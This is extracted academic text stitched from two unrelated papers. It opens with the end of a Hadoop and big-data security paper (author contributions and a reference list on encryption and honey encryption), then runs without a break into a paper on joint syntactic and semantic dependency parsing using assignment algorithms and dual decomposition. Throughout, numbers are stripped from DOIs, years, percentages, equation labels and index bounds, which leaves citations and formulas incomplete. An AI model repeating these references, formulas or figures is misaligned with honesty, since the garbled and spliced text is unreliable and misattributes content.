the final draft. • rajeev kumar and raees ahmad khan conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code is available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. references atallah m, frikken k, blanton m. . dynamic and efficient key management for access hierarchies. in: proc. of ccs’ . bardi m, xianwei z, shuai l, fuhong l. . big data security and privacy: a review. china communication ( ): – doi . /cc. . . bellare m, ristenpart t, rogaway t, stegers p. . format-preserving encryption. in: international workshop on selected areas in cryptography. – . cheikh ab, abbes h, fedak g. . towards privacy for mapreduce on hybrid clouds using information dispersal algorithm. in: data management in cloud, grid and p p systems— th international conference, globe , munich, germany, september – . proceedings, munich, germany, . – . choi h, nam h, hur j. . password typos resilience in honey encryption. in: ieee international conference in information networking (icoin). – . cohen jc, acharya s. . 
toward a trusted hdfs storage platform: mitigating threats to hadoop infrastructure using hardware-accelerated encryption with tpm-rooted key protection. journal of information security and applications ( ): – . colombo p, ferrari e. . access control in the era of big data: state of the art and research directions. in: blue sky session: innovation in access control and privacy-aware data management for big data and iot, sacmat’ , june – . derbeko p, dolev s, gudes e, sharm s. . security and privacy aspects in mapre- duce on clouds: a survey. journal computer science review (no. c): – doi . /j.cosrev. . . . dinh tta, saxena p, cang e-c, ooi bc, zhang c. . m r: enabling stronger privacy in mapreduce computation. in: proceedings of the th usenix security symposium (security). washington, dc. dolev s, gupta p, li y, mehrotra s, sharma s. . privacy-preserving secret shared computations using mapreduce. available at https://arxiv.org/abs/ . . dyer kp, coull se, ristenpart t, shrimpton t. . protocol misidentification made easy with format-transforming encryption. in: proceedings of the acm sigsac conference on computer and communications security. acm, – . ebrahim m, khan s, khalid ub. . khalid ub symmetric algorithm survey: a comparative analysis. international journal of computer applications ( ): – . fu x, gao y, luo b, du x, guizani m. . security threats to hadoop: data leakage attacks and investigation. ieee network ( ): – doi . /mnet. . nm. gupta m, patwa f, sandhu r. . attribute-based access control model for secure big data processing in hadoop ecosystem. in: processing’s of the third acm workshop on attribute-based access control-abac- . – doi . / . . jain p, sardana a. . defending against internet worms using honey farm. in: acm in proceedings of the cube international information technology conference. new york: acm, – . kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cc. . http://dx.doi.org/ . /j.cosrev. . . https://arxiv.org/abs/ . http://dx.doi.org/ . /mnet. . nm http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. jam mr, akbari mk, khanli lm. . a survey on security of hadoop. in: th interna- tional conference on computer and knowledge engineering (iccke). – . jeong ys, kim yt. . a token-based authentication security scheme for hadoop distributed file system using elliptic curve cryptography. journal of computer virology and hacking techniques : – doi . /s - - - . juels a, ristenpart t. . honey encryption: security beyond the brute-force bound. in: advances in cryptology-eurocrypt . – . kim is, kim mh. . agent-based honey net framework for protecting servers in cam- pus networks. iet information security ( ): – doi . /iet-ifs. . . lu w, wang y, juang j, liu j, shen y, wei b. . hybrid storage architecture and efficient mapreduce processing for unstructured data. parallel computing : – doi . /j.parco. . . . maheswari mi, revathy s, tamilarasi r. . secure data transmission for multi sharing in big data storage. indian journal of science and technology ( ) doi . /ijst/ /v i / . mahmoud h, hegazy a, khafagy mh. . an approach for big data security based on hadoop distributed file system. in: international conference on innovative trends in computer engineering (itce). doi . /itce. . . mehmood a, natgunanathan i, xiang y. . protection of big data privacy. in: ieee protection of big data privacy, in ieee access, vol. . piscataway: ieee, – doi . /access. . . mohan rao pr, krishna sm, kumar aps. . 
privacy preservation techniques in big data analytics: a survey. journal of big data :article doi . /s - - - . nguyen tc, shen w, jiang j, xu w. . a novel data encryption in hdfs, ieee international conference on green computing and communications and ieee internet of things and ieee cyber. physical and social computing : – doi . /greencom-ithings-cpscom. . . oktay y, mehrotra s, khadilkar v, kantarcioglu m. . semrod: secure and efficient mapreduce over hybrid clouds. in: proceedings of the acm sigmod international conference on management of data, melbourne, victoria, australia, may —june , . – . owezarski p. . a near real-time algorithm for autonomous identification and characterization of honey pot attacks. in: proceedings of the th acm symposium on information, computer and communications security. – . park s, lee y. . secure hadoop with encrypted hdfs. in: park jj, arabnia hr, kim c, shi w, gil jm, eds. grid and pervasive computing. gpc . lecture notes in computer science, vol. . berlin, heidelberg: springer doi . / - - - - _ . polato i, re r, goldmn a, kon f. . a comprehensive view of hadoopreseach—a systematic literature review. journal of network and computer applications : – doi . /j.jnca. . . . kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /iet-ifs. . http://dx.doi.org/ . /j.parco. . . http://dx.doi.org/ . /ijst/ /v i / http://dx.doi.org/ . /itce. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /greencom-ithings-cpscom. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.jnca. . . http://dx.doi.org/ . /peerj-cs. rerzi ds, terzi r, sagiroglu s. . a survey on security and privacy issues in big data. in: th international conference for internet technology and secured transactions (icitst). – doi . /jicitst. . . schuster f, costa m, fournet c, gkantsidis c, peinado m, mainar-ruiz g, russinovich m. . vc : trustworthy data analytics in the cloud using sgx. in: proceedings of the th ieee symposium on security and privacy (oakland). – . scrinivasan mk, revthy p. . state-of-the-art big data security taxonomies. in: proceeding of the th innovation in software engineering conference—isec. doi . / . . shobha k, nickolas s. . time domain attribute based encryption for big data access control in cloud environment. accents transactions on information security ( ): – doi . /tis. . . song y, shin ys, jang m, chang jw. . design and implementation of hdfs data encryption scheme using aria algorithm on hadoop. in: ieee international confer- ence on big data and smart computing (bigcomp) doi . /bigcomp. . . sudhakar k, farquad mah, narshimha g. . effective convolution method for privacy preserving in cloud over big data using map reduce framework. iet software : – doi . /iet-sen. . . tan sf, samsudin a. . enhanced security of internet banking authentication with extended honey encryption (xhe) scheme. in: zelinka i, vasant p, duy v, dao t, eds. innovative computing, optimization and its applications. studies in computational intelligence, vol. . cham: springer doi . / - - - - _ . tian y. . towards the development of best data security for big data. communication and network : – doi . /cn. . . tyagi n, wang j, wen k, zuo d. . honey encryption applications. network security : – . ulusoy h, kantarcioglu m, pattuk e, hamlen k. . vigiles: fine-grained access control for mapreduce systems. in: ieee international congress on big data anchorage, ak, , – doi . /bigdata.congress. . . 
usama m, zakaria n. . chaos-based simultaneous compression and encryption for hadoop. plos one ( ):e doi . /journal.pone. . varsha bs, suryateja ps. . using attribute- based encryption with advanced encryption standard for secure and scalable sharing of personal health records in cloud. international journal of computer science and information technologies ( ): – . vimercati sdc, foresti s, jajodia s, paraboschi s, samarati p. . over-encryption: management of access control evolution on outsourced data. in: proc. of vldb’ . vinayak pp, nahala ma. . avoiding brute force attack in manet using honey encryption. international journal of science and research ( ): – . vormetric data security. . hadoop: security recommendation for hadoop environments. available at https://securosis.com/assets/library/reports/securing_ hadoop_final_v .pdf . kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jicitst. . http://dx.doi.org/ . / . http://dx.doi.org/ . /tis. . http://dx.doi.org/ . /bigcomp. . http://dx.doi.org/ . /iet-sen. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /cn. . http://dx.doi.org/ . /bigdata.congress. . http://dx.doi.org/ . /journal.pone. https://securosis.com/assets/library/reports/securing_hadoop_final_v .pdf https://securosis.com/assets/library/reports/securing_hadoop_final_v .pdf http://dx.doi.org/ . /peerj-cs. wang y, shen y, wang h, cao j, jiang x. . mtmr: ensuring mapreduce compu- tation integrity with merkle tree-based verifications. ieee transactions on big data ( ): – doi . /tbdata. . . wikipedia. . honey encryption. available at https://en.m.wikipedia.org/wiki/honey_ encryption. xu l, wu x, zhang x. . cl-pre: a certificate less proxy re-encryption scheme for secure data sharing with public cloud. in: acm symposium on information, computer and communications security (asiaccs’ ). new york: acm, – . yalla c, gill a, gupta m, mohankumar h, mccloskey t, minas l, ngo n, tolentino s, watson d. . big data: security intel it’s apache hadoop platform. white paper, intel. available at https://www.intel.com/content/www/us/en/it-management/intel- it-best-practices/big-data-securing-intel-it-apache-hadoop-platform-paper.html. yang c, lin w, liu m. . a novel triple encryption scheme for hadoop-based cloud data security. in: emerging intelligent data and web technologies (eidwt), fourth international conference. – . yin w, lska ji, zhou h. . protecting private data by honey encryption. hindawi se- curity and communication networks :article doi . / / . yu s, wang c, ren k, lou w. a. achieving secure, scalable, and fine-grained access control in cloud computing. in: proc. of ieee infocom’ . san diego. yu s, wang c, ren k, lou w. b. achieving secure, scalable, and fine-grained data access control in cloud computing. communications society ieee infocom. zettaset. . the big data security gap: protecting the hadoop cluster. white paper. available at https://www.zettaset.com/wp-content/uploads/ / /zettaset_wp_ security_ .pdf . zhao j, wang l, tao j, chen j, sun w, ranjan r, kolodziej j, streit a, georgakopoulos d. . a security framework in g-hadoop for big data computing across dis- tributed cloud data centres. journal of computer and system sciences : – doi . /j.jcss. . . . zhao t, wei l, zhang c. . attribute- based encryption scheme based on siff. in: ieee icc communication and information system security symposium. zhou h, wen q. . data security accessing for hdfs based on attribute-group in cloud computing. 
in: international conference on logistics engineering, management and computer science.

Transactions of the Association for Computational Linguistics. Action Editor: Brian Roark. © Association for Computational Linguistics.

Joint Arc-factored Parsing of Syntactic and Semantic Dependencies
Xavier Lluís, Xavier Carreras and Lluís Màrquez
TALP Research Center, Universitat Politècnica de Catalunya, Jordi Girona, Barcelona
{xlluis,carreras,lluism}@lsi.upc.edu

Abstract
In this paper we introduce a joint arc-factored model for syntactic and semantic dependency parsing. The semantic role labeler predicts the full syntactic paths that connect predicates with their arguments. This process is framed as a linear assignment task, which allows to control some well-formedness constraints. For the syntactic part, we define a standard arc-factored dependency model that predicts the full syntactic tree. Finally, we employ dual decomposition techniques to produce consistent syntactic and predicate-argument structures while searching over a large space of syntactic configurations. In experiments on the CoNLL-2009 English benchmark we observe very competitive results.

1 Introduction
Semantic role labeling (SRL) is the task of identifying the arguments of lexical predicates in a sentence and labeling them with semantic roles (Gildea and Jurafsky; Màrquez et al.). SRL is an important shallow semantic task in NLP since predicate-argument relations directly represent semantic properties of the type "who" did "what" to "whom", "how", and "why" for events expressed by predicates (typically verbs and nouns).
Predicate-argument relations are strongly related to the syntactic structure of the sentence: the majority of predicate arguments correspond to some syntactic constituent, and the syntactic structure that connects an argument with the predicate is a strong indicator of its semantic role. Actually, semantic roles represent an abstraction of the syntactic form of a predicative event: while the syntactic functions of arguments change with the form of the event (e.g., active vs. passive forms), the semantic roles of arguments remain invariant to their syntactic realization. Consequently, since the first works, SRL systems have assumed access to the syntactic structure of the sentence (Gildea and Jurafsky; Carreras and Màrquez). A simple approach is to obtain the parse trees as a pre-process to the SRL system, which allows the use of unrestricted features of the syntax. However, as in other pipeline approaches in NLP, it has been shown that the errors of the syntactic parser severely degrade the predictions of the SRL model (Gildea and Palmer).
A common approach to alleviate this problem is to work with multiple alternative syntactic trees and let the SRL system optimize over any input tree or part of it (Toutanova et al.; Punyakanok et al.). As a step further, more recent work has proposed parsing models that predict syntactic structure augmented with semantic predicate-argument relations (Surdeanu et al.; Hajič et al.; Johansson; Titov et al.; Lluís et al.), which is the focus of this paper. These joint models should favor the syntactic structure that is most consistent with the semantic predicate-argument structures of a sentence. In principle, these models can exploit syntactic and semantic features simultaneously, and could potentially improve the accuracy for both syntactic and semantic relations.
One difficulty in the design of joint syntactic-semantic parsing models is that there exist important structural divergences between the two layers.
This is clearly seen in dependency-based representations of syntax and semantic roles (Surdeanu et al.), such as in the example in Figure 1: the construct "loves to" causes the argument "Mary" to be syntactically distant from the predicate "play". Linguistic phenomena such as auxiliary verbs, control and raising typically result in syntactic structures where semantic arguments are not among the direct dependants of their predicate; e.g., a substantial fraction of the arguments in the English development set of the CoNLL shared task are distant. Besides, standard models for dependency parsing crucially depend on arc factorizations of the dependency structure (McDonald et al.; Nivre and Nilsson), otherwise their computational properties break. Hence, it is challenging to define efficient methods for syntactic and semantic dependency parsing that can exploit features of both layers simultaneously.

[Figure 1: A sentence with syntactic dependencies (top) and semantic dependencies for the predicates "loves" and "play" (bottom). The thick arcs illustrate a structural divergence where the argument "Mary" is linked to "play" with a path involving three syntactic dependencies.]

In this paper we propose a method for this joint task. We define predicate-centric semantic models that, rather than predicting just the argument that realizes each semantic role, predict the full syntactic path that connects the predicate with the argument. We show how efficient predictions with these models can be made using assignment algorithms in bipartite graphs. Simultaneously, we use a standard arc-factored dependency model that predicts the full syntactic tree of the sentence. Finally, we employ dual decomposition techniques (Koo et al.; Rush et al.; Sontag et al.) to find agreement between the full dependency tree and the partial syntactic trees linking each predicate with its arguments.
In summary, the main contributions of this paper are:
• We frame SRL as a weighted assignment problem in a bipartite graph. Under this framework we can control assignment constraints between roles and arguments. Key to our method, we can efficiently search over a large space of syntactic realizations of semantic arguments.
• We solve joint inference of syntactic and semantic dependencies with a dual decomposition method, similar to that of Koo et al. Our system produces consistent syntactic and predicate-argument structures while searching over a large space of syntactic configurations. In the experimental section we compare joint and pipeline models.
The final results of our joint syntactic-semantic system are competitive with the state of the art and improve over the best results published by a joint method on the CoNLL-2009 English dataset.

2 A Syntactic-Semantic Dependency Model
We first describe how we represent structures of syntactic and semantic dependencies like the one in Figure 1. Throughout the paper, we will assume a fixed input sentence x with n tokens where lexical predicates are marked. We will also assume fixed sets of syntactic functions Rsyn and semantic roles Rsem. We will represent dependency structures using vectors of binary variables. A variable y_{h,m,l} will indicate the presence of a syntactic dependency from head token h to dependant token m labeled with syntactic function l. Then, a syntactic tree will be denoted as a vector y of variables indexed by syntactic dependencies. Similarly, a variable z_{p,a,r} will indicate the presence of a semantic dependency between predicate token p and argument token a labeled with semantic role r. We will represent a semantic role structure as a vector z indexed by semantic dependencies. Whenever we enumerate syntactic dependencies ⟨h,m,l⟩ we will assume that they are in the valid range for x, i.e. 0 ≤ h ≤ n, 1 ≤ m ≤ n, h ≠ m and l ∈ Rsyn, where h = 0 stands for a special root token. Similarly, for semantic dependencies ⟨p,a,r⟩ we will assume that p points to a predicate of x, 1 ≤ a ≤ n and r ∈ Rsem.
A joint model for syntactic and semantic dependency parsing could be defined as:

  argmax_{y,z}  s_syn(x, y) + s_srl(x, z, y)      (1)

In the equation, s_syn(x, y) gives a score for the syntactic tree y. In the literature, it is standard to use arc-factored models defined as

  s_syn(x, y) = ∑_{y_{h,m,l}=1} s_syn(x, h, m, l)      (2)

where we overload s_syn to be a function that computes scores for individual syntactic dependencies. In linear discriminative models one has s_syn(x, h, m, l) = w_syn · f_syn(x, h, m, l), where f_syn is a feature vector for a syntactic dependency and w_syn is a vector of parameters (McDonald et al.). In Section 6 we describe how we trained the score functions with discriminative methods; a small illustrative sketch of this arc-factored scoring follows.
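As an illustration only, the following sketch shows how an arc-factored score of the form in Eq. (2) can be computed. The feature templates, weights, tree and sentence are invented for the example and are not the ones used in this paper.

```python
def f_syn(x, h, m, l):
    # toy feature templates: head word -> dependant word with the label,
    # and the signed head-dependant distance with the label
    head = x[h - 1] if h > 0 else "ROOT"      # token index 0 is the artificial root
    return [f"{head}->{x[m - 1]}|{l}", f"dist={h - m}|{l}"]

def score_tree(w_syn, x, tree):
    # Eq. (2): the tree score is the sum of per-arc scores w_syn . f_syn(x, h, m, l)
    return sum(
        sum(w_syn.get(feat, 0.0) for feat in f_syn(x, h, m, l))
        for (h, m, l) in tree
    )

x = ["Mary", "plays", "guitar"]
tree = [(0, 2, "ROOT"), (2, 1, "SBJ"), (2, 3, "OBJ")]
w_syn = {"plays->Mary|SBJ": 1.5, "plays->guitar|OBJ": 1.2}
print(score_tree(w_syn, x, tree))             # 2.7
```

Any richer feature map can be plugged in without changing the decomposition, which is what keeps arc-factored inference tractable.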
The other term in Eq. (1), s_srl(x, z, y), gives a score for a semantic dependency structure z using features of the syntactic structure y. Previous work has empirically proved the importance of exploiting syntactic features in the semantic component (Gildea and Jurafsky; Xue and Palmer; Punyakanok et al.). However, without further assumptions, this property makes the optimization problem computationally hard. One simple approximation is to use a pipeline model: first compute the optimal syntactic tree y, and then optimize for the best semantic structure z given y. In the rest of the paper we describe a method that searches over syntactic and semantic dependency structures jointly.
We first note that for a fixed semantic dependency, the semantic component will typically restrict the syntactic features representing the dependency to a specific subtree of y. For example, previous work has restricted such features to the syntactic path that links a predicate with an argument (Moschitti; Johansson), and in this paper we employ this restriction. Figure 1 gives an example of a subtree, where we highlight the syntactic path that connects the semantic dependency between "play" and "Mary" with role ARG0.
Formally, for a predicate p, argument a and role r we define a local syntactic subtree π^{p,a,r} represented as a vector: π^{p,a,r}_{h,m,l} indicates if a dependency ⟨h,m,l⟩ is part of the syntactic path that links predicate p with token a and role r. Given full syntactic and semantic structures y and z it is trivial to construct a vector π that concatenates the vectors π^{p,a,r} for all ⟨p,a,r⟩ in z. The semantic model becomes

  s_srl(x, z, π) = ∑_{z_{p,a,r}=1} s_srl(x, p, a, r, π^{p,a,r})      (3)

where s_srl computes a score for a semantic dependency ⟨p,a,r⟩ together with its syntactic path π^{p,a,r}. As in the syntactic component, this function is typically defined as a linear function over a set of features of the semantic dependency and its path.
The inference problem of our joint model is:

  argmax_{y,z,π}  s_syn(x, y) + s_srl(x, z, π)      (4)
  subject to
    Ctree:    y is a valid dependency tree
    Crole:    ∀p,r : ∑_a z_{p,a,r} ≤ 1
    Carg:     ∀p,a : ∑_r z_{p,a,r} ≤ 1
    Cpath:    ∀p,a,r : if z_{p,a,r} = 1 then π^{p,a,r} is a path from p to a, otherwise π^{p,a,r} = 0
    Csubtree: ∀p,a,r : π^{p,a,r} is a subtree of y

Constraint Ctree dictates that y is a valid dependency tree; see (Martins et al.) for a detailed specification. The next two sets of constraints concern the semantic structure only. Crole imposes that each semantic role is realized at most once. Conversely, Carg dictates that an argument can realize at most one semantic role in a predicate. The final two sets of constraints model the syntactic-semantic interdependencies. Cpath imposes that each π^{p,a,r} represents a syntactic path between p and a whenever there exists a semantic relation. Finally, Csubtree imposes that the paths in π are consistent with the full syntactic structure, i.e. they are subtrees. In this paper we say that the structures π^{p,a,r} are paths from predicates to arguments, but they could be more general subtrees; the condition to build a joint system is that these subtrees must be parseable in the way we describe in Section 3.1. In general a semantic role can be realized with more than one argument, though it is rare; it is not hard to modify our framework to allow for a maximum number of occurrences of a semantic role.
In Section 3 we define a process that optimizes the semantic structure ignoring constraint Csubtree. Then in Section 4 we describe a dual decomposition method that uses the first process repeatedly to solve the joint problem.

3 SRL as Assignment
In this section we frame the problem of finding semantic dependencies as a linear assignment task. The problem we optimize is:

  argmax_{z,π}  s_srl(x, z, π)      (5)
  subject to Crole, Carg, Cpath

In this case we dropped the full syntactic structure y from the optimization in Eq. (4), as well as the corresponding constraints Ctree and Csubtree. As a consequence, we note that the syntactic paths π are not tied to any consistency constraint other than each of the paths being a well-formed sequence of dependencies linking the predicate to the argument. In other words, the optimal solution in this case does not guarantee that the set of paths from a predicate to all of its arguments satisfies tree constraints. We first describe how these paths can be optimized locally. Then we show how to find a solution z satisfying Crole and Carg using an assignment algorithm.

3.1 Local Optimization of Syntactic Paths
Let ẑ and π̂ be the optimal values of Eq. (5). For any ⟨p,a,r⟩, let

  π̃^{p,a,r} = argmax_{π^{p,a,r}}  s_srl(x, p, a, r, π^{p,a,r})      (6)

For any ⟨p,a,r⟩ such that ẑ_{p,a,r} = 1 it has to be that π̂^{p,a,r} = π̃^{p,a,r}. If this were not true, replacing π̂^{p,a,r} with π̃^{p,a,r} would improve the objective of Eq. (5) without violating the constraints, thus contradicting the hypothesis about the optimality of π̂. Therefore, for each ⟨p,a,r⟩ we can optimize its best syntactic path locally as defined in Eq. (6).
In this paper, we will assume access to a list of likely syntactic paths for each predicate p and argument candidate a, such that the optimization in Eq. (6) can be solved explicitly by looping over each path in the list. The main advantage of this method is that, since paths are precomputed, our model can make unrestricted use of syntactic path features; a sketch of this loop is given below.
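Purely as an illustration of Eq. (6), with made-up features and weights rather than the feature set of the paper, the local optimization can be implemented as a loop over the precomputed candidate paths:

```python
def best_path(w_srl, featurize, x, p, a, r, candidate_paths):
    # Eq. (6): among the precomputed candidate paths from p to a, pick the one
    # maximizing the linear score w_srl . f(x, p, a, r, path)
    best, best_score = None, float("-inf")
    for path in candidate_paths:
        score = sum(w_srl.get(feat, 0.0) for feat in featurize(x, p, a, r, path))
        if score > best_score:
            best, best_score = path, score
    return best, best_score

def featurize(x, p, a, r, path):
    # toy features: the role paired with the label sequence and the path length
    labels = "_".join(lab for (h, m, lab) in path)
    return [f"role={r}|path={labels}", f"role={r}|len={len(path)}"]

# invented candidate paths for a predicate-argument pair, as (head, dependant, label) arcs
paths = [[(2, 1, "SBJ")], [(2, 4, "OPRD"), (4, 5, "IM"), (2, 1, "SBJ")]]
w_srl = {"role=ARG0|path=SBJ": 2.0, "role=ARG0|len=1": 0.5}
print(best_path(w_srl, featurize, None, 2, 1, "ARG0", paths))   # ([(2, 1, 'SBJ')], 2.5)
```

Because the candidate paths are fixed in advance, arbitrary features of the whole path can be used without affecting the complexity of inference.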
if this was not true, replacing π̂p,a,r with π̃p,a,r would improve the objective of eq. without violating the constraints, thus contradicting the hypothesis about optimality of π̂. therefore, for each 〈p,a,r〉 we can optimize its best syntactic path locally as defined in eq. . in this paper, we will assume access to a list of likely syntactic paths for each predicate p and argu- ment candidate a, such that the optimization in eq. can be solved explicitly by looping over each path in the list. the main advantage of this method is that, since paths are precomputed, our model can make unrestricted use of syntactic path features. ( ) mary ( ) plays ( ) guitar ( ) null ( ) null ( ) null ( ) arg ( ) arg ( ) arg ( ) null ( ) null ( ) null w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , figure : illustration of the assignment graph for the sen- tence “mary plays guitar”, where the predicate “plays” can have up to three roles: arg (agent), arg (theme) and arg (benefactor). nodes labeled null represent a null role or token. highlighted edges are the correct assignment. it is simple to employ a probabilistic syntactic de- pendency model to create the list of likely paths for each predicate-argument pair. in the experiments we explore this approach and show that with an average of paths per predicate we can recover . % of the correct paths. we leave for future work the development of ef- ficient methods to recover the most likely syntactic structure linking an argument with its predicate. . the assignment algorithm coming back to solving eq. , it is easy to see that an optimal solution satisfying constraints crole and carg can be found with a linear assignment algorithm. the process we describe determines the predicate-argument relations separately for each predicate. assume a bipartite graph of size n with role nodes r . . .rn on one side and argument nodes a . . .an on the other side. assume also a matrix of non-negative scores wi,j corresponding to assigning argument aj to role ri. a linear assignment algo- rithm finds a bijection f : i → j from roles to argu- ments that maximizes ∑n i= wi,f(i). the hungarian algorithm finds the exact solution to this problem in o(n ) time (kuhn, ; burkard et al., ). all that is left is to construct a bipartite graph rep- resenting predicate roles and sentence tokens, such that some roles and tokens can be left unassigned, which is a common setting for assignment tasks. al- gorithm describes a procedure for constructing a weighted bipartite graph for srl, and figure il- lustrates an example of a bipartite graph. we then algorithm construction of an assignment graph for semantic role labeling let p be a predicate with k possible roles. let n be the number of argument candidates in the sentence. this al- gorithm creates a bipartite graph with n = n+k vertices on each side. . create role vertices ri for i = . . .n, where • for ≤ i ≤ k, ri is the i-th role, • for ≤ i ≤ n, rk+i is a special null role. . create argument vertices aj for j = . . .n, where • for ≤ j ≤ n, aj is the j-th argument candidate, • for ≤ j ≤ k, an+j is a special null argument. . define a matrix of model scores s ∈ r(k+ )×n: (a) optimization of syntactic paths: for ≤ i ≤ k, ≤ j ≤ n si,j = max π p,aj ,ri s srl(x,p,aj,ri,π p,aj,ri ) (b) scores of null assignments : for ≤ j ≤ n sk+ ,j = . let s = mini,j si,j , the minimum of any score in s. 
Finally, we note that it is simple to allow for multiple instances of a semantic role by adding more role nodes in Step 1; it would be straightforward to add penalties in Step 3 for multiple instances of roles.

4 A Dual Decomposition Algorithm
We now present a dual decomposition method to optimize Eq. (4) that uses the assignment algorithm presented above as a subroutine. Our method is similar to that of Koo et al., in the sense that our joint optimization can be decomposed into two sub-problems that need to agree on the syntactic dependencies they predict. For a detailed description of dual decomposition methods applied to NLP see (Sontag et al.; Rush et al.).
We note that in Eq. (4) the constraint Csubtree ties the syntactic and semantic structures, imposing that any path π^{p,a,r} that links a predicate p with an argument a must be a subtree of the full syntactic structure y. Formally, the set of constraints is:

  y_{h,m,l} ≥ π^{p,a,r}_{h,m,l}   ∀ p,a,r,h,m,l

These constraints can be compactly written as

  c · y_{h,m,l} ≥ ∑_{p,a,r} π^{p,a,r}_{h,m,l}   ∀ h,m,l

where c is a constant equal to the number of distinct semantic dependencies ⟨p,a,r⟩. In addition, we can introduce a vector of non-negative slack variables ξ, with a component ξ_{h,m,l} for each syntactic dependency, turning the constraints into:

  c · y_{h,m,l} − ∑_{p,a,r} π^{p,a,r}_{h,m,l} − ξ_{h,m,l} = 0   ∀ h,m,l

We can now rewrite Eq. (4) as:

  argmax_{y,z,π,ξ≥0}  s_syn(x, y) + s_srl(x, z, π)      (7)
  subject to  Ctree, Crole, Carg, Cpath
              ∀h,m,l : c · y_{h,m,l} − ∑_{p,a,r} π^{p,a,r}_{h,m,l} − ξ_{h,m,l} = 0

As in Koo et al., we will relax the subtree constraints by introducing a vector of Lagrange multipliers λ indexed by syntactic dependencies, i.e. each coordinate λ_{h,m,l} is a Lagrange multiplier for the constraint associated with ⟨h,m,l⟩. The Lagrangian of the problem is:

  L(y,z,π,ξ,λ) = s_syn(x, y) + s_srl(x, z, π) + λ · ( c·y − ∑_{p,a,r} π^{p,a,r} − ξ )      (8)

We can now formulate Eq. (7) as:

  max_{y,z,π,ξ≥0}  L(y,z,π,ξ,λ)      (9)
  subject to  Ctree, Crole, Carg, Cpath and  c·y − ∑_{p,a,r} π^{p,a,r} − ξ = 0

This optimization problem has the property that its optimum value is the same as the optimum of Eq. (7) for any value of λ, because whenever the constraints are satisfied, the terms in the Lagrangian involving λ are zero. If we remove the subtree constraints from Eq. (9) we obtain the dual objective:

  D(λ) = max_{y,z,π,ξ≥0 s.t. Ctree, Crole, Carg, Cpath}  L(y,z,π,ξ,λ)      (10)
       = max_{y s.t. Ctree} ( s_syn(x, y) + c · y · λ )
         + max_{z,π s.t. Crole, Carg, Cpath} ( s_srl(x, z, π) − λ · ∑_{p,a,r} π^{p,a,r} )
         + max_{ξ≥0} ( −λ · ξ )      (11)

The dual objective is an upper bound on the optimal value of the primal objective of Eq. (7). Thus, we are interested in finding the minimum of the dual in order to tighten this upper bound. We will solve

  min_λ  D(λ)      (12)

using a subgradient method. Algorithm 2 presents pseudo-code. The algorithm takes advantage of the decomposed form of the dual in Eq. (11), where we have rewritten the Lagrangian such that syntactic and semantic structures appear in separate terms; this allows us to compute subgradients efficiently.
In particular, the subgradient of $D$ at a point $\lambda$ is:

$$\Delta(\lambda) = c \cdot \hat{y} - \sum_{p,a,r} \hat{\pi}^{p,a,r} - \hat{\xi}$$

where

$$\hat{y} = \operatorname*{argmax}_{y \;\text{s.t.}\; c_{tree}} \big( s_{syn}(x,y) + c \cdot y \cdot \lambda \big)$$
$$\hat{z}, \hat{\pi} = \operatorname*{argmax}_{z,\pi \;\text{s.t.}\; c_{role}, c_{arg}, c_{path}} \Big( s_{srl}(x,z,\pi) - \lambda \cdot \sum_{p,a,r} \pi^{p,a,r} \Big)$$
$$\hat{\xi} = \operatorname*{argmax}_{\xi \ge 0} \big( -\lambda \cdot \xi \big)$$

Whenever $\hat{\pi}$ is consistent with $\hat{y}$ the subgradient will be zero and the method will converge. When the paths $\hat{\pi}$ contain a dependency $\langle h,m,l\rangle$ that is inconsistent with $\hat{y}$, the associated dual $\lambda_{h,m,l}$ will increase, hence lowering the score of all paths that use $\langle h,m,l\rangle$ at the next iteration; at the same time, the total score for that dependency will increase, favoring syntactic dependency structures alternative to $\hat{y}$. As in previous work, a parameter $\alpha_t$ controls the size of the subgradient steps at iteration $t$.

Algorithm : A dual-decomposition algorithm for syntactic-semantic dependency parsing.
Input: $x$, a sentence; $T$, number of iterations. Output: syntactic and semantic structures $\hat{y}$ and $\hat{z}$. Notation: we use $c_{sem} = c_{role} \wedge c_{arg} \wedge c_{path}$.
1: $\lambda^{1} = 0$ (initialize dual variables)
2: $c$ = number of distinct $\langle h,m,l\rangle$ in $x$
3: for $t = 1 \ldots T$ do
4: $\hat{y} = \operatorname{argmax}_{y \,\text{s.t.}\, c_{tree}} \big( s_{syn}(x,y) + c \cdot \lambda^{t} \cdot y \big)$
5: $\hat{z}, \hat{\pi} = \operatorname{argmax}_{z,\pi \,\text{s.t.}\, c_{sem}} \big( s_{srl}(x,z,\pi) - \lambda^{t} \cdot \sum_{p,a,r} \pi^{p,a,r} \big)$
6: $\lambda^{t+1} = \lambda^{t}$ (dual variables for the next iteration)
7: set $\alpha_t$, the step size of the current iteration
8: for each $\langle h,m,l\rangle$ do
9: $q = \sum_{p,a,r} \hat{\pi}^{p,a,r}_{h,m,l}$ (number of paths using $\langle h,m,l\rangle$)
10: if $q > 0$ and $\hat{y}_{h,m,l} = 0$ then
11: $\lambda^{t+1}_{h,m,l} = \lambda^{t+1}_{h,m,l} + \alpha_t q$
12: break if $\lambda^{t+1} = \lambda^{t}$ (convergence)
13: return $\hat{y}$, $\hat{z}$

